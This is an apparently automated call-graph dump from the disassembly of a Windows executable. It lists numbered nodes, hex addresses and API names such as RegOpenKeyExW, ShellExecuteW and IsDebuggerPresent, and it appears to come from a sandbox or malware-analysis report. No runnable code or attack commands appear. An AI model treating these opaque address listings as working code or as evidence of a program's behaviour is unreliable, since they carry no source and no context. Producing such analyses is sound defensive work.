86344->86363 86346 425bbe 86348 4115d7 52 API calls 86347->86348 86349 40e3ec GetModuleFileNameW 86348->86349 86364 413a0e 86349->86364 86351 40e421 _wcsncat 86367 413a9e 86351->86367 86354 4115d7 52 API calls 86355 40e45e _wcscpy 86354->86355 86370 40bc70 86355->86370 86359 40e4a9 86359->86344 86360 40e4a1 _wcscat _wcslen _wcsncpy 86360->86359 86361 4115d7 52 API calls 86360->86361 86362 401c90 52 API calls 86360->86362 86361->86360 86362->86360 86363->86346 86389 413801 86364->86389 86419 419efd 86367->86419 86371 4115d7 52 API calls 86370->86371 86372 40bc98 86371->86372 86373 4115d7 52 API calls 86372->86373 86374 40bca6 86373->86374 86375 40e4c0 86374->86375 86431 403350 86375->86431 86377 40e4cb RegOpenKeyExW 86378 427190 RegQueryValueExW 86377->86378 86379 40e4eb 86377->86379 86380 4271b0 86378->86380 86381 42721a RegCloseKey 86378->86381 86379->86360 86382 4115d7 52 API calls 86380->86382 86381->86360 86383 4271cb 86382->86383 86438 43652f 52 API calls 86383->86438 86385 4271d8 RegQueryValueExW 86386 4271f7 86385->86386 86388 42720e 86385->86388 86387 402160 52 API calls 86386->86387 86387->86388 86388->86381 86390 41389e 86389->86390 86394 41381a 86389->86394 86391 4139e8 86390->86391 86393 413a00 86390->86393 86416 417f77 46 API calls __getptd_noexit 86391->86416 86418 417f77 46 API calls __getptd_noexit 86393->86418 86394->86390 86404 41388a 86394->86404 86411 419e30 46 API calls __wsplitpath_helper 86394->86411 86395 4139ed 86417 417f25 10 API calls __wsplitpath_helper 86395->86417 86399 41396c 86399->86390 86400 413967 86399->86400 86402 41397a 86399->86402 86400->86351 86401 413929 86401->86390 86403 413945 86401->86403 86413 419e30 46 API calls __wsplitpath_helper 86401->86413 86415 419e30 46 API calls __wsplitpath_helper 86402->86415 86403->86390 86403->86400 86407 41395b 86403->86407 86404->86390 86410 413909 86404->86410 86412 419e30 46 API calls __wsplitpath_helper 86404->86412 86414 419e30 46 API calls __wsplitpath_helper 86407->86414 86410->86399 86410->86401 86411->86404 86412->86410 86413->86403 86414->86400 86415->86400 86416->86395 86417->86400 86418->86400 86420 419f13 86419->86420 86421 419f0e 86419->86421 86428 417f77 46 API calls __getptd_noexit 86420->86428 86421->86420 86427 419f2b 86421->86427 86425 40e454 86425->86354 86426 419f18 86429 417f25 10 API calls __wsplitpath_helper 86426->86429 86427->86425 86430 417f77 46 API calls __getptd_noexit 86427->86430 86428->86426 86429->86425 86430->86426 86432 403367 86431->86432 86433 403358 86431->86433 86434 4115d7 52 API calls 86432->86434 86433->86377 86435 403370 86434->86435 86436 4115d7 52 API calls 86435->86436 86437 40339e 86436->86437 86437->86377 86438->86385 86439 416454 86476 416c70 86439->86476 86441 416460 GetStartupInfoW 86442 416474 86441->86442 86477 419d5a HeapCreate 86442->86477 86444 4164cd 86445 4164d8 86444->86445 86561 41642b 46 API calls 3 library calls 86444->86561 86478 417c20 GetModuleHandleW 86445->86478 86448 4164de 86450 4164e9 __RTC_Initialize 86448->86450 86562 41642b 46 API calls 3 library calls 86448->86562 86497 41aaa1 GetStartupInfoW 86450->86497 86453 416503 GetCommandLineW 86510 41f584 GetEnvironmentStringsW 86453->86510 86457 416513 86516 41f4d6 GetModuleFileNameW 86457->86516 86459 41651d 86460 416528 86459->86460 86564 411924 46 API calls 3 library calls 86459->86564 86520 41f2a4 86460->86520 86463 41652e 86464 416539 86463->86464 86565 411924 46 API calls 3 library calls 86463->86565 86534 411703 86464->86534 86467 416541 86469 41654c __wwincmdln 86467->86469 86566 411924 46 API calls 3 library calls 86467->86566 86538 40d6b0 86469->86538 86472 41657c 86568 411906 46 API calls _doexit 86472->86568 86475 416581 __write 86476->86441 86477->86444 86479 417c34 86478->86479 86480 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86478->86480 86569 4178ff 49 API calls _free 86479->86569 86482 417c87 TlsAlloc 86480->86482 86485 417cd5 TlsSetValue 86482->86485 86486 417d96 86482->86486 86483 417c39 86483->86448 86485->86486 86487 417ce6 __init_pointers 86485->86487 86486->86448 86570 418151 InitializeCriticalSectionAndSpinCount 86487->86570 86489 417d91 86578 4178ff 49 API calls _free 86489->86578 86491 417d2a 86491->86489 86571 416b49 86491->86571 86494 417d76 86577 41793c 46 API calls 4 library calls 86494->86577 86496 417d7e GetCurrentThreadId 86496->86486 86498 416b49 __calloc_crt 46 API calls 86497->86498 86500 41aabf 86498->86500 86499 4164f7 86499->86453 86563 411924 46 API calls 3 library calls 86499->86563 86500->86499 86501 41ac34 86500->86501 86504 416b49 __calloc_crt 46 API calls 86500->86504 86506 41abb4 86500->86506 86502 41ac6a GetStdHandle 86501->86502 86503 41acce SetHandleCount 86501->86503 86505 41ac7c GetFileType 86501->86505 86509 41aca2 InitializeCriticalSectionAndSpinCount 86501->86509 86502->86501 86503->86499 86504->86500 86505->86501 86506->86501 86507 41abe0 GetFileType 86506->86507 86508 41abeb InitializeCriticalSectionAndSpinCount 86506->86508 86507->86506 86507->86508 86508->86499 86508->86506 86509->86499 86509->86501 86511 41f595 86510->86511 86512 41f599 86510->86512 86511->86457 86588 416b04 86512->86588 86514 41f5bb _memmove 86515 41f5c2 FreeEnvironmentStringsW 86514->86515 86515->86457 86517 41f50b _wparse_cmdline 86516->86517 86518 416b04 __malloc_crt 46 API calls 86517->86518 86519 41f54e _wparse_cmdline 86517->86519 86518->86519 86519->86459 86521 41f2bc _wcslen 86520->86521 86525 41f2b4 86520->86525 86522 416b49 __calloc_crt 46 API calls 86521->86522 86527 41f2e0 _wcslen 86522->86527 86523 41f336 86595 413748 86523->86595 86525->86463 86526 416b49 __calloc_crt 46 API calls 86526->86527 86527->86523 86527->86525 86527->86526 86528 41f35c 86527->86528 86531 41f373 86527->86531 86594 41ef12 46 API calls __wsplitpath_helper 86527->86594 86529 413748 _free 46 API calls 86528->86529 86529->86525 86601 417ed3 86531->86601 86533 41f37f 86533->86463 86535 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86534->86535 86537 411750 __IsNonwritableInCurrentImage 86535->86537 86620 41130a 51 API calls __cinit 86535->86620 86537->86467 86539 42e2f3 86538->86539 86540 40d6cc 86538->86540 86621 408f40 86540->86621 86542 40d707 86625 40ebb0 86542->86625 86545 40d737 86628 411951 86545->86628 86550 40d751 86640 40f4e0 SystemParametersInfoW SystemParametersInfoW 86550->86640 86552 40d75f 86641 40d590 GetCurrentDirectoryW 86552->86641 86554 40d767 SystemParametersInfoW 86555 40d794 86554->86555 86556 40d78d FreeLibrary 86554->86556 86557 408f40 VariantClear 86555->86557 86556->86555 86558 40d79d 86557->86558 86559 408f40 VariantClear 86558->86559 86560 40d7a6 86559->86560 86560->86472 86567 4118da 46 API calls _doexit 86560->86567 86561->86445 86562->86450 86567->86472 86568->86475 86569->86483 86570->86491 86573 416b52 86571->86573 86574 416b8f 86573->86574 86575 416b70 Sleep 86573->86575 86579 41f677 86573->86579 86574->86489 86574->86494 86576 416b85 86575->86576 86576->86573 86576->86574 86577->86496 86578->86486 86580 41f683 86579->86580 86583 41f69e _malloc 86579->86583 86581 41f68f 86580->86581 86580->86583 86587 417f77 46 API calls __getptd_noexit 86581->86587 86582 41f6b1 HeapAlloc 86582->86583 86586 41f6d8 86582->86586 86583->86582 86583->86586 86585 41f694 86585->86573 86586->86573 86587->86585 86591 416b0d 86588->86591 86589 4135bb _malloc 45 API calls 86589->86591 86590 416b43 86590->86514 86591->86589 86591->86590 86592 416b24 Sleep 86591->86592 86593 416b39 86592->86593 86593->86590 86593->86591 86594->86527 86596 41377c _free 86595->86596 86597 413753 RtlFreeHeap 86595->86597 86596->86525 86597->86596 86598 413768 86597->86598 86604 417f77 46 API calls __getptd_noexit 86598->86604 86600 41376e GetLastError 86600->86596 86605 417daa 86601->86605 86604->86600 86606 417dc9 __call_reportfault 86605->86606 86607 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86606->86607 86610 417eb5 __call_reportfault 86607->86610 86609 417ed1 GetCurrentProcess TerminateProcess 86609->86533 86611 41a208 86610->86611 86612 41a210 86611->86612 86613 41a212 IsDebuggerPresent 86611->86613 86612->86609 86619 41fe19 86613->86619 86616 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86617 421ff0 __call_reportfault 86616->86617 86618 421ff8 GetCurrentProcess TerminateProcess 86616->86618 86617->86618 86618->86609 86619->86616 86620->86537 86623 408f48 moneypunct 86621->86623 86622 4265c7 VariantClear 86624 408f55 moneypunct 86622->86624 86623->86622 86623->86624 86624->86542 86681 40ebd0 86625->86681 86685 4182cb 86628->86685 86630 41195e 86692 4181f2 LeaveCriticalSection 86630->86692 86632 40d748 86633 4119b0 86632->86633 86634 4119d6 86633->86634 86635 4119bc 86633->86635 86634->86550 86635->86634 86727 417f77 46 API calls __getptd_noexit 86635->86727 86637 4119c6 86728 417f25 10 API calls __wsplitpath_helper 86637->86728 86639 4119d1 86639->86550 86640->86552 86729 401f20 86641->86729 86643 40d5b6 IsDebuggerPresent 86644 40d5c4 86643->86644 86645 42e1bb MessageBoxA 86643->86645 86646 42e1d4 86644->86646 86647 40d5e3 86644->86647 86645->86646 86901 403a50 52 API calls 3 library calls 86646->86901 86799 40f520 86647->86799 86651 40d5fd GetFullPathNameW 86811 401460 86651->86811 86653 40d63b 86655 40d643 86653->86655 86656 42e231 SetCurrentDirectoryW 86653->86656 86654 40d64c 86826 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86654->86826 86655->86654 86902 432fee 6 API calls 86655->86902 86656->86655 86660 42e252 86660->86654 86661 42e25a GetModuleFileNameW 86660->86661 86663 42e274 86661->86663 86664 42e2cb GetForegroundWindow ShellExecuteW 86661->86664 86903 401b10 86663->86903 86668 40d688 86664->86668 86665 40d656 86667 40d669 86665->86667 86670 40e0c0 74 API calls 86665->86670 86834 4091e0 86667->86834 86674 40d692 SetCurrentDirectoryW 86668->86674 86670->86667 86674->86554 86675 42e28d 86910 40d200 52 API calls 2 library calls 86675->86910 86678 42e299 GetForegroundWindow ShellExecuteW 86679 42e2c6 86678->86679 86679->86668 86680 40ec00 LoadLibraryA GetProcAddress 86680->86545 86682 40d72e 86681->86682 86683 40ebd6 LoadLibraryA 86681->86683 86682->86545 86682->86680 86683->86682 86684 40ebe7 GetProcAddress 86683->86684 86684->86682 86686 4182e0 86685->86686 86687 4182f3 EnterCriticalSection 86685->86687 86693 418209 86686->86693 86687->86630 86689 4182e6 86689->86687 86720 411924 46 API calls 3 library calls 86689->86720 86692->86632 86694 418215 __write 86693->86694 86695 418225 86694->86695 86696 41823d 86694->86696 86721 418901 46 API calls 2 library calls 86695->86721 86699 416b04 __malloc_crt 45 API calls 86696->86699 86704 41824b __write 86696->86704 86698 41822a 86722 418752 46 API calls 8 library calls 86698->86722 86700 418256 86699->86700 86702 41825d 86700->86702 86703 41826c 86700->86703 86724 417f77 46 API calls __getptd_noexit 86702->86724 86707 4182cb __lock 45 API calls 86703->86707 86704->86689 86705 418231 86723 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86705->86723 86709 418273 86707->86709 86711 4182a6 86709->86711 86712 41827b InitializeCriticalSectionAndSpinCount 86709->86712 86715 413748 _free 45 API calls 86711->86715 86713 418297 86712->86713 86714 41828b 86712->86714 86726 4182c2 LeaveCriticalSection _doexit 86713->86726 86716 413748 _free 45 API calls 86714->86716 86715->86713 86718 418291 86716->86718 86725 417f77 46 API calls __getptd_noexit 86718->86725 86721->86698 86722->86705 86724->86704 86725->86713 86726->86704 86727->86637 86728->86639 86911 40e6e0 86729->86911 86733 401f41 GetModuleFileNameW 86929 410100 86733->86929 86735 401f5c 86941 410960 86735->86941 86738 401b10 52 API calls 86739 401f81 86738->86739 86944 401980 86739->86944 86741 401f8e 86742 408f40 VariantClear 86741->86742 86743 401f9d 86742->86743 86744 401b10 52 API calls 86743->86744 86745 401fb4 86744->86745 86746 401980 53 API calls 86745->86746 86747 401fc3 86746->86747 86748 401b10 52 API calls 86747->86748 86749 401fd2 86748->86749 86952 40c2c0 86749->86952 86751 401fe1 86752 40bc70 52 API calls 86751->86752 86753 401ff3 86752->86753 86970 401a10 86753->86970 86755 401ffe 86977 4114ab 86755->86977 86758 428b05 86760 401a10 52 API calls 86758->86760 86759 402017 86761 4114ab __wcsicoll 58 API calls 86759->86761 86762 428b18 86760->86762 86763 402022 86761->86763 86765 401a10 52 API calls 86762->86765 86763->86762 86764 40202d 86763->86764 86766 4114ab __wcsicoll 58 API calls 86764->86766 86767 428b33 86765->86767 86768 402038 86766->86768 86770 428b3b GetModuleFileNameW 86767->86770 86769 402043 86768->86769 86768->86770 86771 4114ab __wcsicoll 58 API calls 86769->86771 86772 401a10 52 API calls 86770->86772 86773 40204e 86771->86773 86774 428b6c 86772->86774 86775 402092 86773->86775 86780 401a10 52 API calls 86773->86780 86783 428b90 _wcscpy 86773->86783 86776 40e0a0 52 API calls 86774->86776 86777 4020a3 86775->86777 86775->86783 86778 428b7a 86776->86778 86779 428bc6 86777->86779 86985 40e830 53 API calls 86777->86985 86781 401a10 52 API calls 86778->86781 86785 402073 _wcscpy 86780->86785 86782 428b88 86781->86782 86782->86783 86786 401a10 52 API calls 86783->86786 86789 401a10 52 API calls 86785->86789 86794 4020d0 86786->86794 86787 4020bb 86986 40cf00 53 API calls 86787->86986 86789->86775 86790 4020c6 86791 408f40 VariantClear 86790->86791 86791->86794 86792 402110 86796 408f40 VariantClear 86792->86796 86794->86792 86797 401a10 52 API calls 86794->86797 86987 40cf00 53 API calls 86794->86987 86988 40e6a0 53 API calls 86794->86988 86798 402120 moneypunct 86796->86798 86797->86794 86798->86643 86800 4295c9 __call_reportfault 86799->86800 86801 40f53c 86799->86801 86804 4295d9 GetOpenFileNameW 86800->86804 87667 410120 86801->87667 86803 40f545 87671 4102b0 SHGetMalloc 86803->87671 86804->86801 86806 40d5f5 86804->86806 86806->86651 86806->86653 86807 40f54c 87676 410190 GetFullPathNameW 86807->87676 86809 40f559 87687 40f570 86809->87687 87743 402400 86811->87743 86813 40146f 86814 428c29 _wcscat 86813->86814 87752 401500 86813->87752 86816 40147c 86816->86814 87760 40d440 86816->87760 86818 401489 86818->86814 86819 401491 GetFullPathNameW 86818->86819 86820 402160 52 API calls 86819->86820 86821 4014bb 86820->86821 86822 402160 52 API calls 86821->86822 86823 4014c8 86822->86823 86823->86814 86824 402160 52 API calls 86823->86824 86825 4014ee 86824->86825 86825->86653 86827 428361 86826->86827 86828 4103fc LoadImageW RegisterClassExW 86826->86828 87780 44395e EnumResourceNamesW LoadImageW 86827->87780 87779 410490 7 API calls 86828->87779 86831 40d651 86833 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86831->86833 86832 428368 86833->86665 86835 409202 86834->86835 86836 42d7ad 86834->86836 86893 409216 moneypunct 86835->86893 88043 410940 331 API calls 86835->88043 88046 45e737 90 API calls 3 library calls 86836->88046 86839 409386 86840 40939c 86839->86840 88044 40f190 10 API calls 86839->88044 86840->86668 86900 401000 Shell_NotifyIconW __call_reportfault 86840->86900 86842 4095b2 86842->86840 86844 4095bf 86842->86844 86843 409253 PeekMessageW 86843->86893 88045 401a50 331 API calls 86844->88045 86846 40d410 VariantClear 86846->86893 86847 42d8cd Sleep 86847->86893 86848 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86848->86840 86851 4095f9 86848->86851 86850 42e13b 88064 40d410 VariantClear 86850->88064 86854 42e158 TranslateMessage DispatchMessageW GetMessageW 86851->86854 86854->86854 86857 42e188 86854->86857 86856 409567 PeekMessageW 86856->86893 86857->86840 86859 44c29d 52 API calls 86899 4094e0 86859->86899 86860 46f3c1 107 API calls 86860->86893 86861 40e0a0 52 API calls 86861->86893 86862 46fdbf 108 API calls 86862->86899 86863 42dcd2 WaitForSingleObject 86868 42dcf0 GetExitCodeProcess CloseHandle 86863->86868 86863->86893 86864 409551 TranslateMessage DispatchMessageW 86864->86856 86866 42dd3d Sleep 86866->86899 86867 47d33e 309 API calls 86867->86893 88053 40d410 VariantClear 86868->88053 86871 4094cf Sleep 86871->86899 86872 40c620 timeGetTime 86872->86899 86875 42d94d timeGetTime 88049 465124 53 API calls 86875->88049 86879 465124 53 API calls 86879->86899 86880 42dd89 CloseHandle 86880->86899 86881 408f40 VariantClear 86881->86899 86883 42de19 GetExitCodeProcess CloseHandle 86883->86899 86886 42de88 Sleep 86886->86893 86889 45e737 90 API calls 86889->86893 86892 42e0cc VariantClear 86892->86893 86893->86839 86893->86843 86893->86846 86893->86847 86893->86850 86893->86856 86893->86860 86893->86861 86893->86863 86893->86864 86893->86866 86893->86867 86893->86871 86893->86875 86893->86889 86893->86892 86895 408f40 VariantClear 86893->86895 86893->86899 87781 4091b0 86893->87781 87839 40afa0 86893->87839 87865 408fc0 86893->87865 87900 408cc0 86893->87900 87914 4096a0 86893->87914 88041 40d150 TranslateAcceleratorW 86893->88041 88042 40d170 IsDialogMessageW GetClassLongW 86893->88042 88047 465124 53 API calls 86893->88047 88048 40c620 timeGetTime 86893->88048 88063 40e270 VariantClear moneypunct 86893->88063 86894 401b10 52 API calls 86894->86899 86895->86893 86897 401980 53 API calls 86897->86899 86899->86859 86899->86862 86899->86872 86899->86879 86899->86880 86899->86881 86899->86883 86899->86886 86899->86893 86899->86894 86899->86897 88050 45178a 54 API calls 86899->88050 88051 47d33e 331 API calls 86899->88051 88052 453bc6 54 API calls 86899->88052 88054 40d410 VariantClear 86899->88054 88055 443d19 67 API calls _wcslen 86899->88055 88056 4574b4 VariantClear 86899->88056 88057 403cd0 86899->88057 88061 4731e1 VariantClear 86899->88061 88062 4331a2 6 API calls 86899->88062 86900->86668 86901->86653 86902->86660 86904 401b16 _wcslen 86903->86904 86905 4115d7 52 API calls 86904->86905 86907 401b63 86904->86907 86906 401b4b _memmove 86905->86906 86908 4115d7 52 API calls 86906->86908 86909 40d200 52 API calls 2 library calls 86907->86909 86908->86907 86909->86675 86910->86678 86912 40bc70 52 API calls 86911->86912 86913 401f31 86912->86913 86914 402560 86913->86914 86915 40256d __write_nolock 86914->86915 86916 402160 52 API calls 86915->86916 86918 402593 86916->86918 86920 4025bd 86918->86920 86989 401c90 86918->86989 86919 4026f0 52 API calls 86919->86920 86920->86919 86922 4026a7 86920->86922 86924 401b10 52 API calls 86920->86924 86926 401c90 52 API calls 86920->86926 86992 40d7c0 52 API calls 2 library calls 86920->86992 86921 4026db 86921->86733 86922->86921 86923 401b10 52 API calls 86922->86923 86925 4026d1 86923->86925 86924->86920 86993 40d7c0 52 API calls 2 library calls 86925->86993 86926->86920 86994 40f760 86929->86994 86932 410118 86932->86735 86934 42805d 86935 42806a 86934->86935 87050 431e58 86934->87050 86937 413748 _free 46 API calls 86935->86937 86938 428078 86937->86938 86939 431e58 82 API calls 86938->86939 86940 428084 86939->86940 86940->86735 86942 4115d7 52 API calls 86941->86942 86943 401f74 86942->86943 86943->86738 86945 4019a3 86944->86945 86946 401985 86944->86946 86945->86946 86947 4019b8 86945->86947 86949 40199f 86946->86949 87655 403e10 53 API calls 86946->87655 87656 403e10 53 API calls 86947->87656 86949->86741 86950 4019c4 86950->86741 86953 40c2c7 86952->86953 86954 40c30e 86952->86954 86957 40c2d3 86953->86957 86958 426c79 86953->86958 86955 40c315 86954->86955 86956 426c2b 86954->86956 86959 40c321 86955->86959 86960 426c5a 86955->86960 86962 426c4b 86956->86962 86963 426c2e 86956->86963 87657 403ea0 52 API calls __cinit 86957->87657 87662 4534e3 52 API calls 86958->87662 87658 403ea0 52 API calls __cinit 86959->87658 87661 4534e3 52 API calls 86960->87661 87660 4534e3 52 API calls 86962->87660 86966 40c2de 86963->86966 87659 4534e3 52 API calls 86963->87659 86966->86751 86971 401a30 86970->86971 86972 401a17 86970->86972 86974 402160 52 API calls 86971->86974 86973 401a2d 86972->86973 87663 403c30 52 API calls _memmove 86972->87663 86973->86755 86976 401a3d 86974->86976 86976->86755 86978 411523 86977->86978 86979 4114ba 86977->86979 87666 4113a8 58 API calls 3 library calls 86978->87666 86984 40200c 86979->86984 87664 417f77 46 API calls __getptd_noexit 86979->87664 86982 4114c6 87665 417f25 10 API calls __wsplitpath_helper 86982->87665 86984->86758 86984->86759 86985->86787 86986->86790 86987->86794 86988->86794 86990 4026f0 52 API calls 86989->86990 86991 401c97 86990->86991 86991->86918 86992->86920 86993->86921 87054 40f6f0 86994->87054 86996 40f77b _strcat moneypunct 87062 40f850 86996->87062 87002 40f7fc 87003 427c2a 87002->87003 87005 40f804 87002->87005 87091 414d04 87003->87091 87078 414a46 87005->87078 87009 40f80e 87009->86932 87013 4528bd 87009->87013 87010 427c59 87097 414fe2 87010->87097 87012 427c79 87014 4150d1 _fseek 81 API calls 87013->87014 87015 452930 87014->87015 87597 452719 87015->87597 87018 452948 87018->86934 87019 414d04 __fread_nolock 61 API calls 87020 452966 87019->87020 87021 414d04 __fread_nolock 61 API calls 87020->87021 87022 452976 87021->87022 87023 414d04 __fread_nolock 61 API calls 87022->87023 87024 45298f 87023->87024 87025 414d04 __fread_nolock 61 API calls 87024->87025 87026 4529aa 87025->87026 87027 4150d1 _fseek 81 API calls 87026->87027 87028 4529c4 87027->87028 87029 4135bb _malloc 46 API calls 87028->87029 87030 4529cf 87029->87030 87031 4135bb _malloc 46 API calls 87030->87031 87032 4529db 87031->87032 87033 414d04 __fread_nolock 61 API calls 87032->87033 87034 4529ec 87033->87034 87035 44afef GetSystemTimeAsFileTime 87034->87035 87036 452a00 87035->87036 87037 452a36 87036->87037 87038 452a13 87036->87038 87040 452aa5 87037->87040 87041 452a3c 87037->87041 87039 413748 _free 46 API calls 87038->87039 87043 452a1c 87039->87043 87042 413748 _free 46 API calls 87040->87042 87603 44b1a9 87041->87603 87045 452aa3 87042->87045 87046 413748 _free 46 API calls 87043->87046 87045->86934 87048 452a25 87046->87048 87047 452a9d 87049 413748 _free 46 API calls 87047->87049 87048->86934 87049->87045 87051 431e64 87050->87051 87052 431e6a 87050->87052 87053 414a46 __fcloseall 82 API calls 87051->87053 87052->86935 87053->87052 87055 425de2 87054->87055 87056 40f6fc _wcslen 87054->87056 87055->86996 87057 40f710 WideCharToMultiByte 87056->87057 87058 40f756 87057->87058 87059 40f728 87057->87059 87058->86996 87060 4115d7 52 API calls 87059->87060 87061 40f735 WideCharToMultiByte 87060->87061 87061->86996 87064 40f85d __call_reportfault _strlen 87062->87064 87065 40f7ab 87064->87065 87110 414db8 87064->87110 87066 4149c2 87065->87066 87125 414904 87066->87125 87068 40f7e9 87068->87003 87069 40f5c0 87068->87069 87073 40f5cd _strcat __write_nolock _memmove 87069->87073 87070 414d04 __fread_nolock 61 API calls 87070->87073 87072 425d11 87074 4150d1 _fseek 81 API calls 87072->87074 87073->87070 87073->87072 87077 40f691 __tzset_nolock 87073->87077 87213 4150d1 87073->87213 87075 425d33 87074->87075 87076 414d04 __fread_nolock 61 API calls 87075->87076 87076->87077 87077->87002 87079 414a52 __write 87078->87079 87080 414a64 87079->87080 87081 414a79 87079->87081 87353 417f77 46 API calls __getptd_noexit 87080->87353 87083 415471 __lock_file 47 API calls 87081->87083 87089 414a74 __write 87081->87089 87085 414a92 87083->87085 87084 414a69 87354 417f25 10 API calls __wsplitpath_helper 87084->87354 87337 4149d9 87085->87337 87089->87009 87422 414c76 87091->87422 87093 414d1c 87094 44afef 87093->87094 87590 442c5a 87094->87590 87096 44b00d 87096->87010 87098 414fee __write 87097->87098 87099 414ffa 87098->87099 87100 41500f 87098->87100 87594 417f77 46 API calls __getptd_noexit 87099->87594 87102 415471 __lock_file 47 API calls 87100->87102 87104 415017 87102->87104 87103 414fff 87595 417f25 10 API calls __wsplitpath_helper 87103->87595 87106 414e4e __ftell_nolock 51 API calls 87104->87106 87107 415024 87106->87107 87596 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87107->87596 87109 41500a __write 87109->87012 87111 414dd6 87110->87111 87112 414deb 87110->87112 87121 417f77 46 API calls __getptd_noexit 87111->87121 87112->87111 87114 414df2 87112->87114 87123 41b91b 79 API calls 11 library calls 87114->87123 87116 414ddb 87122 417f25 10 API calls __wsplitpath_helper 87116->87122 87118 414e18 87120 414de6 87118->87120 87124 418f98 77 API calls 6 library calls 87118->87124 87120->87064 87121->87116 87122->87120 87123->87118 87124->87120 87128 414910 __write 87125->87128 87126 414923 87181 417f77 46 API calls __getptd_noexit 87126->87181 87128->87126 87129 414951 87128->87129 87144 41d4d1 87129->87144 87130 414928 87182 417f25 10 API calls __wsplitpath_helper 87130->87182 87133 414956 87134 41496a 87133->87134 87135 41495d 87133->87135 87137 414992 87134->87137 87138 414972 87134->87138 87183 417f77 46 API calls __getptd_noexit 87135->87183 87161 41d218 87137->87161 87184 417f77 46 API calls __getptd_noexit 87138->87184 87139 414933 __write @_EH4_CallFilterFunc@8 87139->87068 87145 41d4dd __write 87144->87145 87146 4182cb __lock 46 API calls 87145->87146 87159 41d4eb 87146->87159 87147 41d560 87186 41d5fb 87147->87186 87148 41d567 87149 416b04 __malloc_crt 46 API calls 87148->87149 87151 41d56e 87149->87151 87151->87147 87153 41d57c InitializeCriticalSectionAndSpinCount 87151->87153 87152 41d5f0 __write 87152->87133 87154 41d59c 87153->87154 87155 41d5af EnterCriticalSection 87153->87155 87158 413748 _free 46 API calls 87154->87158 87155->87147 87156 418209 __mtinitlocknum 46 API calls 87156->87159 87158->87147 87159->87147 87159->87148 87159->87156 87189 4154b2 47 API calls __lock 87159->87189 87190 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87159->87190 87162 41d23a 87161->87162 87163 41d255 87162->87163 87174 41d26c __wopenfile 87162->87174 87195 417f77 46 API calls __getptd_noexit 87163->87195 87165 41d25a 87196 417f25 10 API calls __wsplitpath_helper 87165->87196 87166 41d47a 87200 417f77 46 API calls __getptd_noexit 87166->87200 87167 41d48c 87192 422bf9 87167->87192 87171 41d47f 87201 417f25 10 API calls __wsplitpath_helper 87171->87201 87172 41499d 87185 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87172->87185 87174->87166 87180 41d421 87174->87180 87197 41341f 58 API calls 2 library calls 87174->87197 87176 41d41a 87176->87180 87198 41341f 58 API calls 2 library calls 87176->87198 87178 41d439 87178->87180 87199 41341f 58 API calls 2 library calls 87178->87199 87180->87166 87180->87167 87181->87130 87182->87139 87183->87139 87184->87139 87185->87139 87191 4181f2 LeaveCriticalSection 87186->87191 87188 41d602 87188->87152 87189->87159 87190->87159 87191->87188 87202 422b35 87192->87202 87194 422c14 87194->87172 87195->87165 87196->87172 87197->87176 87198->87178 87199->87180 87200->87171 87201->87172 87205 422b41 __write 87202->87205 87203 422b54 87204 417f77 __wsplitpath_helper 46 API calls 87203->87204 87206 422b59 87204->87206 87205->87203 87207 422b8a 87205->87207 87209 417f25 __wsplitpath_helper 10 API calls 87206->87209 87208 422400 __tsopen_nolock 109 API calls 87207->87208 87210 422ba4 87208->87210 87212 422b63 __write 87209->87212 87211 422bcb __wsopen_helper LeaveCriticalSection 87210->87211 87211->87212 87212->87194 87215 4150dd __write 87213->87215 87214 4150e9 87244 417f77 46 API calls __getptd_noexit 87214->87244 87215->87214 87216 41510f 87215->87216 87226 415471 87216->87226 87219 4150ee 87245 417f25 10 API calls __wsplitpath_helper 87219->87245 87225 4150f9 __write 87225->87073 87227 415483 87226->87227 87228 4154a5 EnterCriticalSection 87226->87228 87227->87228 87229 41548b 87227->87229 87230 415117 87228->87230 87231 4182cb __lock 46 API calls 87229->87231 87232 415047 87230->87232 87231->87230 87233 415067 87232->87233 87234 415057 87232->87234 87239 415079 87233->87239 87247 414e4e 87233->87247 87302 417f77 46 API calls __getptd_noexit 87234->87302 87238 41505c 87246 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87238->87246 87264 41443c 87239->87264 87242 4150b9 87277 41e1f4 87242->87277 87244->87219 87245->87225 87246->87225 87248 414e61 87247->87248 87249 414e79 87247->87249 87303 417f77 46 API calls __getptd_noexit 87248->87303 87251 414139 __fclose_nolock 46 API calls 87249->87251 87253 414e80 87251->87253 87252 414e66 87304 417f25 10 API calls __wsplitpath_helper 87252->87304 87255 41e1f4 __write 51 API calls 87253->87255 87256 414e97 87255->87256 87257 414f09 87256->87257 87259 414ec9 87256->87259 87263 414e71 87256->87263 87305 417f77 46 API calls __getptd_noexit 87257->87305 87260 41e1f4 __write 51 API calls 87259->87260 87259->87263 87261 414f64 87260->87261 87262 41e1f4 __write 51 API calls 87261->87262 87261->87263 87262->87263 87263->87239 87265 414455 87264->87265 87269 414477 87264->87269 87266 414139 __fclose_nolock 46 API calls 87265->87266 87265->87269 87267 414470 87266->87267 87306 41b7b2 77 API calls 4 library calls 87267->87306 87270 414139 87269->87270 87271 414145 87270->87271 87272 41415a 87270->87272 87307 417f77 46 API calls __getptd_noexit 87271->87307 87272->87242 87274 41414a 87308 417f25 10 API calls __wsplitpath_helper 87274->87308 87276 414155 87276->87242 87278 41e200 __write 87277->87278 87279 41e223 87278->87279 87280 41e208 87278->87280 87282 41e22f 87279->87282 87285 41e269 87279->87285 87329 417f8a 46 API calls __getptd_noexit 87280->87329 87331 417f8a 46 API calls __getptd_noexit 87282->87331 87283 41e20d 87330 417f77 46 API calls __getptd_noexit 87283->87330 87309 41ae56 87285->87309 87287 41e234 87332 417f77 46 API calls __getptd_noexit 87287->87332 87290 41e23c 87333 417f25 10 API calls __wsplitpath_helper 87290->87333 87291 41e26f 87293 41e291 87291->87293 87294 41e27d 87291->87294 87334 417f77 46 API calls __getptd_noexit 87293->87334 87319 41e17f 87294->87319 87295 41e215 __write 87295->87238 87298 41e289 87336 41e2c0 LeaveCriticalSection __unlock_fhandle 